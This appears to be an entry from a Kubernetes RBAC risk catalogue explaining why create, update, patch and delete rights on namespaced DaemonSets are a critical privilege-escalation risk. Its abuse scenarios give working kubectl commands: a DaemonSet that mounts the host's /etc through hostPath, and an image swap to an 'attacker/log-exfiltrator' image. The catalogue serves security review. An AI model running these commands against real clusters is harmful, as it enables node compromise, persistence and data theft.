Manage DaemonSets in a namespace (runs on nodes, high impact)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1036 |
| Name | Manage DaemonSets in a namespace (runs on nodes, high impact) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | Role |
| API Groups | apps |
| Resources | daemonsets |
| Verbs | create, update, patch, delete |
| Tags | NodeAccess Persistence PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Allows creating, updating, or deleting DaemonSets within a specific namespace. Even if namespaced, DaemonSets can be configured to run on multiple nodes, and if they deploy privileged pods, this can lead to node compromise, privilege escalation, and persistence.
Abuse Scenarios
- Create a new DaemonSet with hostPath access in the namespace.
kubectl create -n <namespace> -f - <<EOF
apiVersion: apps/v1
kind: DaemonSet
metadata:
name: hostpath-daemonset
spec:
selector:
matchLabels:
app: hostpath-ds
template:
metadata:
labels:
app: hostpath-ds
spec:
containers:
- name: hostpath-container
image: busybox
command: ["/bin/sh", "-c", "sleep infinity"]
volumeMounts:
- mountPath: /host-etc
name: host-etc
volumes:
- name: host-etc
hostPath:
path: /etc
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
- Update an existing DaemonSet’s image to a malicious one.
kubectl set image daemonset/<daemonset-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image daemonset/my-logging-agent agent=attacker/log-exfiltrator -n monitoring